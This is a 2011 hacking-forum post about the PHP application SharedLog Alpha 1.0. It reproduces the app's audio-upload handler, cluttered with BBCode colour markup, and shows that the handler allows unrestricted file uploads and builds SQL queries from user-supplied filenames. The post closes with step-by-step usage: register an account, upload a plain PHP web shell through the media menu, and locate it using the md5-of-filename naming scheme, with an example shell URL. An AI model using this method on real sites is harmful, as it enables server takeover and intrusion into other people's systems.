Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #464  
Старый 03.08.2011, 20:31
Unknown
Guest
Сообщений: n/a
Провел на форуме:
4100

Репутация: 74
По умолчанию
SharedLog Alpha 1.0

В топку скули и ИКСы, сразу заливаемся!

slideshow_uploadaudio.content.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]....

[/COLOR][COLOR="#0000BB"]sess[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = @[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#FF8000"]//

[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] );

if ( isSet([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]]) ) {

[/COLOR][COLOR="#FF8000"]//

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]strToUpper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"];

 }else if ([/COLOR][COLOR="#0000BB"]strToUpper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"];

 }else {

[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"]= ( isSet([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]: (isSet([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]: array() ) ) ;

 }

}

[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]= (isSet([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]) ;

[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]&&isSet([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]) ;

[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strToLower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]) ;

[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = ( @[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]) ;

[/COLOR][COLOR="#0000BB"]set_cookie_reffered[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ev_ref_id'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ev_http'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ev_date'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// from lib.sys

// Prevent not logged in user from accessing the pages for only logged in users.

// now must use session to store userID and maybe sid also. Sid is tied to user password

// it's at least a substring of md5($password)

// it will be more secure to use both uid and sid, but not necessary.

[/COLOR][COLOR="#007700"]if ( empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'user_idnr'[/COLOR][COLOR="#007700"]]) )

{

 if ( !isset([/COLOR][COLOR="#0000BB"]$NOT_LOGINED_USER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]]) )

 {

[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MAIN_FILE[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'?a=login&not-logined&from='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]urlEncode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) );

 }

}

else

{

[/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]];

}

if (!isset([/COLOR][COLOR="#0000BB"]$hdlGlobal[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$hdlGlobal[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]clsGlobal[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$objLogger[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlCache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlTpl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arrSettings[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arrResourceType[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'DIR_AUDIO'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/monster/Content/resources/audiofiles/"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]#define('DIR_AUDIO', "/usr/local/apache/sites/dcomments.com/htdocs/video_streaming/prototype/resources/audiofiles/");//Temporary location

//this is used when audio file uploaded and inserted it will automatically get selected in dropdown

[/COLOR][COLOR="#0000BB"]$intAudioClipId[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]/*Language translation class for multilingual setup start*/

[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = ( @[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]) ;

[/COLOR][COLOR="#FF8000"]#--------------------------------------------------------------------------

# TRANSLATION

#--------------------------------------------------------------------------

[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PARAMS'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'strings_tables'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$hdlCache[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnGetValues[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'arrLangs'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//$TR2 =& Translation2::factory($GLOBALS['tr2_driver'], $GLOBALS['DBINFO'], $GLOBALS['PARAMS'] ) ;

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = @[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] ;

[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] );

[/COLOR][COLOR="#FF8000"]#--------------------------------------------------------------------------

/*Language translation class for multilingual setup end*/

[/COLOR][COLOR="#0000BB"]$arrLangVars[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"create_slide_show"[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'imageid'[/COLOR][COLOR="#007700"]])!=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$imageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'imageid'[/COLOR][COLOR="#007700"]];

}

else

{

[/COLOR][COLOR="#0000BB"]$imageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tempimageid'[/COLOR][COLOR="#007700"]];

}

[/COLOR][COLOR="#FF8000"]/*Handling file upload start*/

[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'btnupload'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlGlobal[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]arrUser[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_idnr'[/COLOR][COLOR="#007700"]];

if([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]])

{

[/COLOR][COLOR="#0000BB"]$flag[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// flag variable used to check if there was any error while image upload, Aysha 9 Apr 2007

[/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]DIR_AUDIO[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$hdlUploadFile[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]clsUploadAVFiles[/COLOR][COLOR="#007700"]();

 if(![/COLOR][COLOR="#0000BB"]$hdlUploadFile[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnIsVirusInFile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]))

 {

[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Error uploading File, File contains virus!"[/COLOR][COLOR="#007700"];

 return[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#FF8000"]//echo $strDestinationLocation;

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"]))

{

[/COLOR][COLOR="#0000BB"]$strType[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sqlResource[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO `RESOURCE` SET `userinfo_id`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" , `resource_type_id`=3 , `description`='Auto created by Uploader' , `added_time`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d H:i:s"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', `upload_method_id`='www' , `img_type`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$strType[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' , `orig_name`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' , `deleted`='0' , `featured`='N' , `nntp_messages_id`='0'"[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnInsertUpdate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlResource[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' in '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FUNCTION__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'(); 20050705_032027 '[/COLOR][COLOR="#007700"]) ;

[/COLOR][COLOR="#0000BB"]$intResourceId[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnLastInsertId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'RESOURCE'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$strDestinationLocation[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlUploadFile[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnPreparePath[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$intResourceId[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DIR_AUDIO[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$strType[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"audio"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//**********Prepare location for audio file

 /*echo $strUploadPath."
";

echo DIR_AUDIO."/".$strDestinationLocation;*/

[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DIR_AUDIO[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$strDestinationLocation[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#FF8000"]//**************Update avatar field in db

[/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO AUDIO_FILES VALUES('','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$intResourceId[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',UNIX_TIMESTAMP( ),'N')"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnInsertUpdate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' in '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FUNCTION__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'(); 20050705_032027 '[/COLOR][COLOR="#007700"]) ;

[/COLOR][COLOR="#0000BB"]$intAudioClipId[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnLastInsertId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'AUDIO_FILES'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"File uploaded successfully!"[/COLOR][COLOR="#007700"];

}

else

{

[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Image Uploading failed"[/COLOR][COLOR="#007700"];

 }

 }

}

[/COLOR][COLOR="#FF8000"]/*

function #-------------------{ fnGetPageSlideShows }-------------------()

{} */

 # +-----------------------------------------------------------------------+

 # | Description: Handling file upload end

 # | Params: $intAudioClipId - Integer audio clip id

 # +-----------------------------------------------------------------------+

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]fnGetHTMLSelectBoxAudioList[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'Select Audio'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]fnBuildAudioDropdownDynamicOptions[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 return[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"];

 }

function[/COLOR][COLOR="#0000BB"]fnBuildAudioDropdownDynamicOptions[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"])

 {

 global[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]/*Feching preloaded Audio files*/

// Temporary static files given

[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'----Preloaded Audio Clips----'[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'Audio file 1'[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'Audio file 2'[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'Audio file 3'[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'Audio file 4'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]/*Fetching user's uploaded audio files*/

[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_idnr'[/COLOR][COLOR="#007700"]];

 if([/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id,file_name,resource_id FROM AUDIO_FILES WHERE user_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnFetchQueryResult[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' in '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FUNCTION__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'(); 20050705_032027 '[/COLOR][COLOR="#007700"]) ;

 if([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"])>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"----Your Audio Clips----"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$selected[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 foreach ([/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$arrRow[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$arrRow[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 }

 }

 return[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"];

 }

}

....

[/COLOR][/COLOR
Usage:

-> Регаем юзера

-> В медиа-меню заливаем шелл "в открытом виде".

-> Методика именования заливаемых файлов следующая:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$ShellName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]) .[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];[/COLOR][/COLOR
-> То бишь заливая шелл shell.php будет именован(и расположен):

Код:
Code:
site.com/resources/audiodir/25a452927110e39a345a2511c57647f2_shell.php
 
Ответить с цитированием